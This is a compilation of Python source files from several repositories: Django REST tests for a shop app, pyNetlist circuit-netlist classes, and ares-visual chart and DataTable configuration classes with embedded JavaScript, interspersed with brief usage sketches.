{
"source": "jealuna/Tienda",
"score": 2
}
#### File: tienda/productos/tests.py
```python
from django.contrib.auth.models import User
from rest_framework.test import APITestCase
from productos.models import producto
from productos.serializers import ProductoSerializer
class AlmacenTestCase(APITestCase):
def setUp(self):
self.username = 'john_doe'
self.password = '<PASSWORD>'
        self.user = User.objects.create_user(username=self.username, password=self.password)  # create_user hashes the password
self.client.force_authenticate(user=self.user)
producto.objects.create(
SKU='N.ISE32RS', descripcion='Celular')
producto.objects.create(
SKU='N.J7NEOD', descripcion='Celular')
def test_get_lista(self):
response = self.client.get('/api/productos/', format='json')
productos = producto.objects.all()
serializer = ProductoSerializer(productos, many=True)
self.assertEqual(response.data, serializer.data)
self.assertEqual(response.status_code, 200)
```
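The test assumes a `ProductoSerializer` and a route mounted at `/api/productos/`. A minimal sketch of that wiring under DRF's router conventions (the field list and viewset are illustrative, not the repository's actual code):
```python
# Hypothetical serializer/routing matching what tests.py imports and requests
from rest_framework import routers, serializers, viewsets
from productos.models import producto

class ProductoSerializer(serializers.ModelSerializer):
    class Meta:
        model = producto
        fields = ('SKU', 'descripcion')

class ProductoViewSet(viewsets.ModelViewSet):
    queryset = producto.objects.all()
    serializer_class = ProductoSerializer

router = routers.DefaultRouter()
router.register(r'productos', ProductoViewSet)  # included under /api/ in urls.py
```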
#### File: tienda/utils/utils.py
```python
import pandas as pd
def lee_archivo(archivo):
df = pd.read_excel(archivo)
    df.fillna(0, inplace=True)
return df
if __name__ == "__main__":
    df = lee_archivo('Orden de Compras.xlsx')
```
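Note that `pd.read_excel` needs an Excel engine available (e.g. `openpyxl` for `.xlsx`). A quick toy run showing what the `fillna(0)` step does (the columns here are made up for illustration):
```python
import pandas as pd

df = pd.DataFrame({'producto': ['Celular', None], 'cantidad': [3, None]})
df.fillna(0, inplace=True)
# None in the object column becomes 0; NaN in the numeric column becomes 0.0
print(df.to_dict('records'))
# [{'producto': 'Celular', 'cantidad': 3.0}, {'producto': 0, 'cantidad': 0.0}]
```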
{
"source": "jeame/pyNetlist",
"score": 3
}
#### File: pyNetlist/pyNetlist/base.py
```python
class BaseObj(object):
'''Base class for devices and nets'''
name = None
def __init__(self, *args, **kwargs):
self.type = self.__class__
if self.name is None:
self.name = self.__class__.__name__
self.id = None
self.parseargs(*args, **kwargs)
self.post_init(*args, **kwargs)
def post_init(self, *args, **kwargs):
pass
def parseargs(self, *args, **kwargs):
pass
def get_ref(self):
if self.id is None:
id = ''
else:
id = str(self.id)
return self.name + id
@property
def ref(self):
return self.get_ref()
class BaseObjList(object):
'''Base class for lists of devices, ports, params...'''
def __init__(self, arr):
self.elements = arr
def __len__(self):
return self.elements.__len__()
def __iter__(self):
return self.elements.__iter__()
def __getitem__(self, val):
if isinstance(val, list):
return self.__class__([self[i] for i in val])
elif isinstance(val, (int, slice)):
return self.elements[val]
else:
raise TypeError('Unsupported index type: %s' % val.__class__.__name__)
class DeviceList(BaseObjList):
'''Contains an array of devices of a specific type'''
def __getattr__(self, port_id):
return PortList([d[port_id] for d in self.elements])
class PortList(BaseObjList):
pass
class ParamList(BaseObjList):
pass
class Device(BaseObj):
'''Device base class'''
ports = []
params = []
def parseargs(self, **kwargs):
self.ports = kwargs.pop('ports', self.ports)
self.params = kwargs.pop('params', self.params)
self.name = kwargs.get('name', self.name)
self._ports = [kwargs.get(id, Net()) for id in self.ports]
self._params = []
for id in self.params:
val = kwargs.get(id, None)
if isinstance(val, Param):
self._params.append(val)
else:
self._params.append(Param(val))
for i, port_id in enumerate(self.ports):
links = self._ports[i].links
if self not in links:
links[self] = [port_id]
elif port_id not in links[self]:
links[self].append(port_id)
def __getitem__(self, id):
if id in self.ports:
return self._ports[self.ports.index(id)]
elif id in self.params:
return self._params[self.params.index(id)]
else:
raise AttributeError('This port does not exist: %s' % id)
def __getattr__(self, id):
return self.__getitem__(id)
class Net(BaseObj):
def post_init(self, **kwargs):
self.name = kwargs.get('name', 'N')
self.globalnet = kwargs.get('globalnet', False)
self.links = {}
class Param(BaseObj):
def parseargs(self, value=None):
self.value = value
```
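A short usage sketch of these base classes; the `Resistor` device below is hypothetical, not part of the library:
```python
# Hypothetical device built on the base classes above
class Resistor(Device):
    name = 'R'
    ports = ['p', 'n']
    params = ['value']

n1 = Net()                        # unnamed net, defaults to name 'N'
r1 = Resistor(p=n1, value=Param(100))
print(r1.ref)                     # 'R' -- an id is only assigned once added to a Circuit
print(r1['p'] is n1)              # True; the 'n' port got a fresh Net() by default
print(r1.value.value)             # 100, via Device.__getattr__ -> __getitem__
```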
#### File: pyNetlist/pyNetlist/circuit.py
```python
from .base import *  # package-relative import; the implicit form only works on Python 2
class Circuit(Device):
'''Container for the whole circuit'''
def parseargs(self, **kwargs):
for key,val in kwargs.items():
if isinstance(val, Net) and key not in self.ports:
self.ports.append(key)
if isinstance(val, Param) and key not in self.params:
self.params.append(key)
super(Circuit, self).parseargs(**kwargs)
def post_init(self, **kwargs):
self.devices = {}
self.nets = set()
self.parameters = set()
self.maxid = 0
self.maxid_nets = 0
self.maxid_params = 0
for p in self._params: #index parameters
self.add(p)
        class Subcircuit(Device): # nested class: its body runs in this method's scope, so self here is the enclosing Circuit
circuit = self
ports = self.ports
params = self.params
name = self.name
self.Instance = Subcircuit
def add(self, obj):
'''Add single device instances to the circuit'''
if obj.type is Circuit:
for n in obj.nets:
self.add(n)
for dgroup in obj.devices.values():
for d in dgroup:
self.add(d)
return obj
elif obj.type is Net:
if obj.globalnet == True:
return #ignore global nets
if obj not in self.nets:
obj.id = self.maxid_nets + 1
self.nets.add(obj)
self.maxid_nets = obj.id
return obj
elif obj.type is Param:
if obj not in self.parameters:
obj.id = self.maxid_params + 1
self.parameters.add(obj)
self.maxid_params = obj.id
return obj
else: #obj is device
if obj.type not in self.devices:
self.devices[obj.type] = set()
devlist = self.devices[obj.type]
if obj not in devlist:
for p in obj._ports + obj._params:
self.add(p)
obj.id = self.maxid + 1
devlist.add(obj)
self.maxid = obj.id
return obj
return False
def addArray(self, D, size=1, **kwargs):
'''Add an array of device instances of class D to the circuit
If dimensions match, ports are handled automatically'''
devices = []
        for i in range(size):  # range (xrange was Python 2 only)
kwargs_new = {}
for key,val in kwargs.items():
if isinstance(val, (PortList, ParamList)):
if len(val)==size:
kwargs_new[key] = val[i]
else:
raise ValueError('Dimension mismatch: %s.%s (%s, %s)' % (D.__name__, key, len(val), size))
else:
kwargs_new[key] = val
devices.append(self.addNode(D, **kwargs_new))
return DeviceList(devices)
def addNode(self, D, **kwargs):
return self.add(D(**kwargs))
```
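Continuing the hypothetical `Resistor` from the previous sketch, adding devices to a `Circuit` is what assigns ids and indexes nets and params:
```python
c = Circuit()
vdd = Net(name='VDD')
gnd = Net(name='GND', globalnet=True)      # global nets are skipped by add()
r1 = c.addNode(Resistor, p=vdd, n=gnd, value=Param(1000))
print(r1.ref)                              # 'R1' -- ids are assigned on add()
rs = c.addArray(Resistor, size=3, p=vdd, n=gnd)
print([r.ref for r in rs])                 # ['R2', 'R3', 'R4']
```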
{
"source": "jeamick/ares-visual",
"score": 2
}
#### File: configs/ChartJs/ChartJsBase.py
```python
import json
from ares.Lib.js import AresJsEncoder
class ChartJs(dict):
"""
"""
name, chartCall, jsCls = 'Default configuration', None, 'Chart'
listAttributes = ['yAxes', 'xAxes', 'datasets']
points = ['circle', 'triangle', 'rect', 'rectRounded', 'rectRot', 'cross', 'crossRot', 'star', 'line', 'dash']
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {
'options': {'maintainAspectRatio': False, 'responsive': True, 'legend': {'display': True},
'scales': {
'yAxes': [{
'ticks': {'display': True, 'beginAtZero': True}
}],
'xAxes': [{'ticks': {'display': True}}]}
}
}
def __init__(self, aresObj, data, seriesProperties):
self.aresObj, self.seriesProperties = aresObj, seriesProperties
resolvedAttrs = {}
self.rAttr(self._attrs, resolvedAttrs)
self.update(resolvedAttrs)
    self['type'] = json.dumps(self.chartObj) # chartObj is expected to be defined by concrete subclasses
self.data = self.transformation(data)
self.config()
def rAttr(self, srcVals, dstVals, srcKey=None):
"""
:category:
:rubric: PY
:type: System
:dsc:
"""
if isinstance(srcVals, dict):
for key, val in srcVals.items():
if isinstance(val, dict):
dstVals[key] = {}
self.rAttr(val, dstVals[key])
else:
self.rAttr(val, dstVals, key)
elif isinstance(srcVals, list):
dstVals[srcKey] = []
for val in srcVals:
dstVals[srcKey].append({})
self.rAttr(val, dstVals[srcKey][-1])
else:
if isinstance(srcVals, tuple):
srcVals = json.dumps(srcVals[0]) if srcVals[1] else srcVals[0]
if srcKey is not None:
if isinstance(srcVals, str):
# TODO: To be tested in Python 3
dstVals[srcKey] = srcVals
else:
dstVals[srcKey] = json.dumps(srcVals)
elif isinstance(dstVals, list):
dstVals.append(json.dumps(srcVals))
def config(self):
"""
:category: Chart Series Properties
:rubric: JS
:type: Configuration
:dsc:
Extra configuration function to change the data options. Those parameters will be used on the javascript part
when the final Javascript chart object will be passed to the charting library.
"""
pass
def _colors(self, cList, index=None):
"""
:category: Chart Series Colors
:rubric: JS
:type: Configuration
:dsc:
"""
if index is None:
for i in range(len(self.data._schema['values'])):
if len(cList) > i:
self.seriesProperties['dynamic'].setdefault(i, {})['backgroundColor'] = cList[i]
else:
self.seriesProperties['dynamic'].setdefault(index, {})['backgroundColor'] = cList
@classmethod
def transformation(cls, data):
"""
:category: Data Transformation
:rubric: PY
:type: Transformation
:dsc:
Data transformation for the DataFrame. Using this function might create a new DataFrame. Thus a new Javascript
object will be created and the logic within the global filters might not work correctly.
If you use this, please make it obvious to ensure other users might not be surprised
"""
return data
def addAttr(self, key, val, tree=None, category=None, isPyData=True):
if isPyData:
val = json.dumps(val, cls=AresJsEncoder.AresEncoder)
if tree is not None:
      if category not in self:
self[category] = {}
chartLocation = self[category]
for subCategory in tree:
if isinstance(subCategory, tuple):
subCategory, subCategoryIndex = subCategory
else:
subCategory, subCategoryIndex = subCategory, 0
        if subCategory in self.listAttributes:
          if subCategory not in chartLocation:
            chartLocation[subCategory] = []
            for i in range(subCategoryIndex + 1):
              chartLocation[subCategory].append({})
          if len(chartLocation[subCategory]) < subCategoryIndex + 1:
            # pad the list with empty dicts up to the requested index
            for i in range(len(chartLocation[subCategory]), subCategoryIndex + 1):
              chartLocation[subCategory].append({})
          chartLocation = chartLocation[subCategory][subCategoryIndex]
        else:
          if subCategory not in chartLocation:
            chartLocation[subCategory] = {}
          chartLocation = chartLocation[subCategory]
if isinstance(chartLocation, list):
chartLocation[0][key] = val
else:
chartLocation[key] = val
elif category is not None:
self.setdefault(category, {})[key] = val
else:
self[key] = val
def delAttr(self, keys, tree=None, category=None):
""" """
chart = self
if tree is not None:
chartLocation = self.get(category, {})
for subCategory in tree:
chartLocation = chartLocation.get(subCategory, {})
chart = chartLocation
if category is not None:
chart = self.get(category, {})
for attr in keys:
if attr in chart:
del chart[attr]
def dataSetType(self, chartType, seriesId):
"""
"""
self.addAttr('type', chartType)
```
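A small sketch of what a concrete configuration produces once `rAttr` has resolved `_attrs` (the `Line` subclass is hypothetical; the base class leaves `chartObj` to subclasses):
```python
class Line(ChartJs):
  chartObj = 'line'  # hypothetical subclass; only chartObj is needed by __init__

cfg = Line(aresObj=None, data=[], seriesProperties={'dynamic': {}})
print(cfg['type'])                            # '"line"' -- JSON-encoded for the JS layer
print(cfg['options']['maintainAspectRatio'])  # 'false'  -- rAttr json.dumps'd the bool
print(cfg['options']['scales']['yAxes'])      # [{'ticks': {'display': 'true', 'beginAtZero': 'true'}}]
```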
#### File: configs/DataTable/DataTableBase.py
```python
import json
class TableBasic(dict):
"""
:category: Datatable
:rubric: PY
:type: configuration
:dsc:
The base table used in the framework. This configuration is forced in the aresObj.table() call.
:example: aresObj.table([])
:example: aresObj.datatable('base', [] )
"""
name, tableCall = 'Table', 'base'
_attrs = {'stateSave': False, 'searching': False, 'paginate': False, 'pageLength': 30, 'autoWidth': False,
'colReorder': False, 'scrollX': False, 'scrollCollapse': False, 'dom': ('Bfrtip', True),
#'bInfo': False,
#'lengthMenu': [ [ 10, 25, 50, -1 ], [ '10 rows', '25 rows', '50 rows', 'Show all' ] ]
}
def __init__(self, aresObj, header, data, jsTableId):
self.update( {'buttons': [], 'columnDefs': [] } )
resolvedAttrs = {}
self.rAttr(self._attrs, resolvedAttrs)
self.update(resolvedAttrs)
self.aresObj, self.header, self.data, self.jsTableId = aresObj, header, data, jsTableId
cellIdx, cellNames = [], []
for i, rec in enumerate(self.header):
if rec.get('format', '').startswith('CELL'):
cellIdx.append("td:eq(%s)" % i)
cellNames.append(rec['data'])
self.config()
self.aresObj.jsGlobal.fnc('EditableCell(e, tableObj)', '''
$(e).css( {'color': 'blue', 'font-weight': 'bold'}) ;
$(e).attr('contenteditable', true) ; $(e).focus() ; ''')
self.aresObj.jsGlobal.fnc('StopEditingCell(e, tableObj)', '''
var row = tableObj.cell($(e).parent()).index().row;
var column = tableObj.cell($(e).parent()).index().column;
tableObj.cell(row, column).data($(e).text()) ;
$(tableObj.cell(row, column).node()).css( {'color': 'blue', 'font-weight': 'bold'} ) ;
$(e).attr('contenteditable', false) ;
if (!(typeof window[$(e).data('table') + '_changed'] === 'undefined')) { $(tableObj.cell(row, 3).node()).find('#save').show() ; }
    ''')
self.aresObj.jsGlobal.fnc('UpdateCell(e, tableObj)', '''
var row = tableObj.cell($(e).parent()).index().row;
var column = tableObj.cell($(e).parent()).index().column;
tableObj.cell(row, column).data(e.value) ;
if (!(typeof window[$(e).data('table') + '_changed'] === 'undefined')) {
var saveIndex = -1 ;
tableObj.settings().init().columns.forEach( function(rec, index) { if (rec.data == '_save') { saveIndex = index; } }) ;
if ( saveIndex != -1) { $(tableObj.cell(row, saveIndex).node()).find('#save').show() ; } }
    ''')
self.aresObj.jsGlobal.fnc('UpdateCheckBox(e, tableObj)', '''
var row = tableObj.cell($(e).parent()).index().row;
var column = tableObj.cell($(e).parent()).index().column;
tableObj.cell(row, column).data(e.checked) ;
if (!(typeof window[$(e).data('table') + '_changed'] === 'undefined')) { var saveIndex = -1 ;
tableObj.settings().init().columns.forEach( function(rec, index) { if (rec.data == '_save') { saveIndex = index; } }) ;
if ( saveIndex != -1) { $(tableObj.cell(row, saveIndex).node()).find('#save').show() ; } }
    ''')
if cellNames:
      if 'createdRowParts' not in self:
self['createdRowParts'] = []
for i, cellName in enumerate(cellNames):
self['createdRowParts'].append(
" if ( data['%(colName)s'].dsc != undefined ) { $('%(colIndex)s', row).attr( 'title', data['%(colName)s'].dsc ) } " % {
'colName': cellName, 'colIndex': cellIdx[i]})
def rAttr(self, srcVals, dstVals, srcKey=None):
"""
:category:
:rubric: PY
:type: System
:dsc:
"""
if isinstance(srcVals, dict):
for key, val in srcVals.items():
if isinstance(val, dict):
dstVals[key] = {}
self.rAttr(val, dstVals[key])
else:
self.rAttr(val, dstVals, key)
elif isinstance(srcVals, list):
dstVals[srcKey] = []
for val in srcVals:
dstVals[srcKey].append({})
self.rAttr(val, dstVals[srcKey][-1])
else:
if isinstance(srcVals, tuple):
srcVals = json.dumps(srcVals[0]) if srcVals[1] else srcVals[0]
if srcKey is not None:
if isinstance(srcVals, str):
# TODO: To be tested in Python 3
dstVals[srcKey] = srcVals
else:
dstVals[srcKey] = json.dumps(srcVals)
elif isinstance(dstVals, list):
dstVals.append(json.dumps(srcVals))
def resolveList(self, currDict, currList, listResult):
"""
"""
for item in currList:
if isinstance(item, dict):
subList = []
self.resolveDict(item, subList)
listResult.append("{ %s }" % (", ".join(subList)))
elif isinstance(item, list):
subList = []
self.resolveList(currDict, item, subList)
listResult.append("[%s]" % (",".join(subList)))
else:
listResult.append(item)
def resolveDict(self, currDict, listResult):
"""
"""
for key, item in currDict.items():
if isinstance(item, dict):
subList = []
self.resolveDict(item, subList)
listResult.append("%s: {%s}" % (key, ", ".join(subList)))
elif isinstance(item, list):
subList = []
self.resolveList(currDict, item, subList)
listResult.append("%s: [%s]" % (key, ",".join(subList)))
else:
listResult.append("%s: %s" % (key, item))
def getIndices(self, cols):
"""
"""
colIdx = []
for i, rec in enumerate(self.header):
if rec['data'] in cols:
colIdx.append(i)
return colIdx
def addAttr(self, key, val, category=None, isPyData=True):
"""
"""
if isPyData:
val = json.dumps(val)
if category is not None:
if isinstance(category, tuple):
category, index = category
self[category][index][key] = val
else:
self.setdefault(category, {})[key] = val
else:
self[key] = val
def delAttr(self, keys, category=None):
"""
"""
chart = self.get(category, {}) if category is not None else self
for attr in keys:
if attr in chart:
del chart[attr]
def js(self):
"""
"""
ctx = []
if 'createdRowParts' in self:
self['createdRow'] = "function ( row, data, index ) { %s }" % ";".join(self['createdRowParts'])
del self['createdRowParts']
if getattr(self, 'footerType', None) == 'sum':
self['footerCallback'] = ''' function ( row, data, start, end, display ) {
var api = this.api();
api.columns('.sum', { page: 'current' } ).every(function (el) {
var sum = this.data().reduce(function (a, b) {var x = parseFloat(a) || 0; var y = parseFloat(b) || 0;return x + y; }, 0);
$(this.footer()).html( sum.formatMoney(0, ',', '.') ); } );}
'''
self.resolveDict(self, ctx)
return ctx
def config(self): pass
def ordering(self, orders):
"""
:category:
:rubric: JS
:type: Configuration
:dsc:
Set the default ordering rule in the datatable. By default the first column is used.
It is possible here to provide a list of column with the type of sorting rule to apply asc or desc.
:link Datatable Documentation: https://datatables.net/examples/basic_init/table_sorting.html
:example: tableObj.ordering(False)
"""
if not orders:
self['order'] = 'false'
else:
orderCols, orderTypes = [], []
for colName, orderType in orders:
orderCols.append(colName)
orderTypes.append(orderType)
orderColsIdx = self.getIndices(orderCols)
self['order'] = []
for i, j in enumerate(orderColsIdx):
self['order'].append('[%s, "%s"]' % (j, orderTypes[i]))
```
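A sketch of the serialisation step done by `resolveDict`/`resolveList`: values are kept as raw JavaScript fragments and joined into a DataTables options literal (bypassing `__init__` here, which needs a full `aresObj`):
```python
tbl = TableBasic.__new__(TableBasic)  # dict subclass: usable without __init__ for this demo
ctx = []
tbl.resolveDict({'paging': 'false', 'order': ['[0, "asc"]'], 'scrollY': '"200px"'}, ctx)
print("{%s}" % ", ".join(ctx))
# {paging: false, order: [[0, "asc"]], scrollY: "200px"}
```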
#### File: configs/NVD3/NVD3Base.py
```python
import json
class NVD3(dict):
name, chartObj, chartCall = 'Default Configuration', None, None
convertFnc, eventObject, seriesStyle = None, 'multibar', ''
_attrs = {} # Please do not change this object, it will impact everything as dictionaries are mutable objects
priorities = ['color', 'showValues', 'x', 'y', 'interpolate']
def __init__(self, aresObj, data, htmlId):
self.aresObj, self.chartId, self.axis = aresObj, htmlId, {}
self.data = self.transformation(data)
for key, pyVal in self._attrs.items():
(val, isPyData) = pyVal if isinstance(pyVal, tuple) else (pyVal, True)
self.addAttr(key, val, isPyData=isPyData)
self.config()
def config(self): pass
@classmethod
def transformation(cls, data):
return data
  @property
  def jsQueryData(self):
    # default event payload sent back to the Python layer on chart events
    return '''{
      event_index: event.data.x, event_name: event.data.key, event_label: event.data.label,
      event_val: event.data.y, event_code: '%(htmlId)s' }''' % {'htmlId': self.chartId}
def jsChartDef(self):
if self.chartObj is None:
raise Exception("Probleme in the class, chartObj should be defined")
return 'nv.models.%s()' % self.chartObj
def addAttr(self, key, val=None, category=None, isPyData=True):
if isinstance(key, dict):
for k, v in key.items():
if isPyData:
v = json.dumps(v)
if category is not None:
self.setdefault(category, {})[k] = v
else:
self[k] = v
else:
if isPyData:
val = json.dumps(val)
if category is not None:
self.setdefault(category, {})[key] = val
else:
self[key] = val
def delAttr(self, keys, category=None):
chart = self.get(category, {}) if category is not None else self
for attr in keys:
if attr in chart:
del chart[attr]
def interpolate(self, val="basis"): self.addAttr('interpolate', val)
def style(self, seriesAttr=None, recAttr=None):
# style( {'C': {'shape': 'triangle-up'} }, {'data': 'label', 'attr': {'January': {'shape': 'triangle-up','color': 'red'} } })
self.seriesStyle = '''
values.forEach( function( rec ) {
var seriesAttr = %(seriesAttr)s; var recAttr = %(recAttr)s;
if( Object.keys(seriesAttr).length > 0) {
if( seriesAttr[rec.key] != undefined ) {
for (var k in seriesAttr[rec.key]) { rec[k] = seriesAttr[rec.key][k]} }};
if( Object.keys(recAttr).length > 0) {
if ((recAttr.data == 'key') && ( rec.key in recAttr.attr) ) {
rec.values.forEach( function(i) {
for (var k in recAttr.attr[rec.key]) { i[k] = recAttr.attr[rec.key][k] ; }
})
} else {
rec.values.forEach( function(i) {
if ( recAttr.attr[i[recAttr.data]] != undefined ) {
for (var k in recAttr.attr[i[recAttr.data]]) { i[k] = recAttr.attr[i[recAttr.data]][k] ; }
}
})
}
}
}) ''' % {'seriesAttr': json.dumps({} if seriesAttr is None else seriesAttr),
'recAttr': json.dumps({} if recAttr is None else recAttr)}
def jsToTable(self):
""" Convert the date from the chart to a table """
return ''' '''
# return '''
# var tableData = {dom: 'Bfrtip', buttons: [
# {'extend': 'excelHtml5', 'className': 'py_cssdivhidden', 'title': '%(htmlId)s_excel'},
# {'extend': 'pdfHtml5', 'className': 'py_cssdivhidden', 'title': '%(htmlId)s_pdf'}],
# data: [], columns: [ {data: 'row', title: 'Series'} ], scrollY: "%(height)s", paging:false, searching:true, autoWidth:true };
# for (var j in values[0].values[0] ) { tableData.columns.push( {data: j, title: j } ) ; } ;
# values.forEach( function(rec, index) { rec.values.forEach( function(i) { i.row = rec.key ; tableData.data.push( i ) ; }) ; }) ;
# ''' % {'height': self.height, 'htmlId': self.chartId}
def toJs(self, options=None):
chart = dict([(key, val) for key, val in self.items() if val])
ctx = [] # Just to ensure that the Structure of the chart component will not be changed in the python layer
for attrOrder in self.priorities:
if attrOrder in chart:
if isinstance(chart[attrOrder], dict):
for subKey, subVal in chart[attrOrder].items():
ctx.append("%s.%s(%s)" % (attrOrder, subKey, subVal))
else:
ctx.append("%s(%s)" % (attrOrder, chart[attrOrder]))
del chart[attrOrder]
for key, val in chart.items():
if isinstance(val, dict):
for subKey, subVal in val.items():
ctx.append("%s.%s(%s)" % (key, subKey, subVal))
else:
ctx.append("%s(%s)" % (key, val))
axis = []
for key, vals in self.axis.items():
axis.append("%s.%s.%s" % ('%s_chart' % self.chartId, key, ".".join(["%s(%s)" % (subKey, val) for subKey, val in vals.items()])))
return '%s.%s;%s' % (self.jsChartDef(), ".".join(ctx), ";".join(axis))
```
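A sketch of what `toJs` emits for a minimal configuration (the `Demo` subclass is hypothetical; this code path does not touch `aresObj`):
```python
class Demo(NVD3):
  chartObj = 'lineChart'
  _attrs = {'showLegend': True, 'x': ("function(d){return d.x;}", False)}

cfg = Demo(aresObj=None, data=[], htmlId='chart1')
print(cfg.toJs())
# nv.models.lineChart().x(function(d){return d.x;}).showLegend(true);
```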
#### File: configs/NVD3/NVD3Line.py
```python
import json
from ares.configs.NVD3 import NVD3Base
class NVD3Line(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall, eventObject = 'Lines', 'lineChart', 'line', 'interactiveLayer'
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {'showYAxis': True, 'showXAxis': True, 'useInteractiveGuideline': True, 'showLegend': True, "legendPosition": True,
'x': ("function(d) { return d.x; }", False), 'y': ("function(d) { return d.y; }", False)
}
@property
def jsQueryData(self):
return '''{event_code: '%(htmlId)s'}''' % {'htmlId': self.chartId}
class NVD3SparkLine(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall = 'Spark Line (with Focus)', 'sparklinePlus', 'sparkline'
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {'showLastValue': True}
def style(self, seriesAttr=None, recAttr=None):
self.seriesStyle = '''
values.forEach( function( rec ) {
var recAttr = %(recAttr)s;
if ( recAttr.attr[rec[recAttr.data]] != undefined ) {
for (var k in recAttr.attr[rec[recAttr.data]]) { rec[k] = recAttr.attr[rec[recAttr.data]][k] ; }
}
}) ''' % {'recAttr': json.dumps({} if recAttr is None else recAttr)}
def jsToTable(self):
""" Convert the date from the chart to a table """
return '''
var tableData = {dom: 'Bfrtip', buttons: [
{'extend': 'excelHtml5', 'className': 'py_cssdivhidden', 'title': '%(htmlId)s_excel'},
{'extend': 'pdfHtml5', 'className': 'py_cssdivhidden', 'title': '%(htmlId)s_pdf'}],
data: [], columns: [], scrollY: "%(height)s", paging:false, searching:true, autoWidth:true };
console.log(values) ;
for (var j in values[0] ) { tableData.columns.push( {data: j, title: j } ) ; } ;
values.forEach( function(rec, index) { tableData.data.push( rec ); }) ;
''' % {'height': self.height, 'htmlId': self.chartId}
```
#### File: configs/NVD3/NVD3Multi.py
```python
import json
from ares.configs.NVD3 import NVD3Base
class NVD3MultiBar(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall = 'Multi Bars', 'multiBarChart', 'multi-bar'
_attrs = {'reduceXTicks': True, 'showControls': True, 'groupSpacing': 0.1, 'rotateLabels': -15, 'showLegend': True}
#def xAxisSort(self, htmlId):
# return "%(htmlId)s_data[0].values = %(htmlId)s_data[0].values.sort(keysrt('x', false)); ;" % {'htmlId': htmlId}
class NVD3MultiBarStacked(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall = 'Multi Bars', 'multiBarChart', 'multi-bar-stacked'
_attrs = {'reduceXTicks': True, 'showControls': True, 'groupSpacing': 0.1, 'rotateLabels': -15, 'showLegend': True, 'stacked': True}
def xAxisSort(self, htmlId):
return "%(htmlId)s_data[0].values = %(htmlId)s_data[0].values.sort(keysrt('x', false)); ;" % {'htmlId': htmlId}
class NVD3MultiChart(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall = 'MultiCharts', 'multiChart', 'multi'
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {'showLegend': False}
def style(self, seriesAttr=None, recAttr=None):
self.seriesStyle = '''
values.forEach( function( rec ) {
var seriesAttr = %(seriesAttr)s; var recAttr = %(recAttr)s;
if( Object.keys(seriesAttr).length > 0) {
if( seriesAttr[rec.key] != undefined ) {
if ( seriesAttr[rec.key].type == undefined) { rec.type = 'line';} else { rec.type = seriesAttr[rec.key].type } ;
if ( seriesAttr[rec.key].yAxis == undefined) { rec.yAxis = 1;} else { rec.yAxis = seriesAttr[rec.key].yAxis };
for (var k in seriesAttr[rec.key]) { rec[k] = seriesAttr[rec.key][k]} }
else { rec.type = 'line' ; rec.yAxis = 1; }}
else { rec.type = 'line' ; rec.yAxis = 1;}
if( Object.keys(recAttr).length > 0) {
if ((recAttr.data == 'key') && ( rec.key in recAttr.attr) ) {
rec.values.forEach( function(i) {
for (var k in recAttr.attr[rec.key]) { i[k] = recAttr.attr[rec.key][k] ; }
})
} else {
rec.values.forEach( function(i) {
if ( recAttr.attr[i[recAttr.data]] != undefined ) {
for (var k in recAttr.attr[i[recAttr.data]]) { i[k] = recAttr.attr[i[recAttr.data]][k] ; }
}
})
}
}
}) ''' % {'seriesAttr': json.dumps({} if seriesAttr is None else seriesAttr), 'recAttr': json.dumps({} if recAttr is None else recAttr)}
class NVD3Scatter(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall, eventObject = 'Scatter', 'scatterChart', 'scatter', 'scatter'
shapes = ['thin-x', 'circle', 'cross', 'triangle-up', 'triangle-down', 'diamond', 'square']
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {'showDistX': True, 'showDistY': True, 'duration': 300}
@property
def jsQueryData(self):
return '''{
event_index: event.point.x, event_label: event.point.label,
event_val: event.point.y, event_code: '%(htmlId)s' }''' % {'htmlId': self.chartId}
class NVD3Area(NVD3Base.NVD3):
"""
:category: Chart
:rubric: JS
:type: Configuration
"""
name, chartObj, chartCall = 'Stacked Area', 'stackedAreaChart', 'area'
eventObject = 'stacked'
# Please do not change this object, it will impact everything as dictionaries are mutable objects
_attrs = {'duration': 300, 'showLegend': True}
@property
def jsQueryData(self):
return '''{
event_index: event.point.x, event_label: event.point.label,
event_val: event.point.y, event_code: '%(htmlId)s' }''' % {'htmlId': self.chartId}
```
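For instance, `xAxisSort` on the stacked multi-bar simply emits a JavaScript sort on the first series (`keysrt` is assumed to be a helper available on the JS side):
```python
cfg = NVD3MultiBarStacked(aresObj=None, data=[], htmlId='chart2')
print(cfg.xAxisSort('chart2'))
# chart2_data[0].values = chart2_data[0].values.sort(keysrt('x', false)); ;
```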
#### File: ares-visual/Lib/AresRun.py
```python
import os
import importlib
from ares.Lib import AresImports
ares_flask = AresImports.requires(name="flask", reason='Missing Package', install='flask', autoImport=True, sourceScript=__file__)
class Run(object):
"""
:category:
:rubric:
:type:
:dsc:
"""
__slots__ = ['mac_address', 'host_name', 'current_user', 'report_name', 'script_name', 'local_path', 'url_root',
'title', 'is_local', 'url']
def __init__(self, report_name, script_name, current_user, host_name, mac_address, url_root, title=None):
self.report_name, self.script_name = report_name, script_name
self.current_user, self.host_name = current_user, host_name
self.mac_address, self.url_root = mac_address, url_root
self.url = "#"
if report_name is not None:
mod = importlib.import_module('%s.__init__' % report_name)
self.local_path, _ = os.path.split(os.path.abspath(mod.__file__))
if script_name is not None and ares_flask is not None:
self.url = "%s/run/%s/%s" % (ares_flask.current_app.config['URLS']['ares-report'], self.report_name, self.script_name)
else:
self.local_path = None
self.title = "%s \ %s " % (self.report_name.upper(), self.script_name) if title is None else title
self.is_local = True if (ares_flask is None or ares_flask.request.url_root.startswith('http://127.0.0.1')) else False
```
#### File: ares-visual/Lib/AresSql.py
```python
import inspect
import ares.doc
import ares.utils.AresSiphash
from ares.Lib.AresImports import requires
# Will automatically add the external library to be able to use this module
ares_pandas = requires("pandas", reason='Missing Package', install='pandas', autoImport=True, sourceScript=__file__)
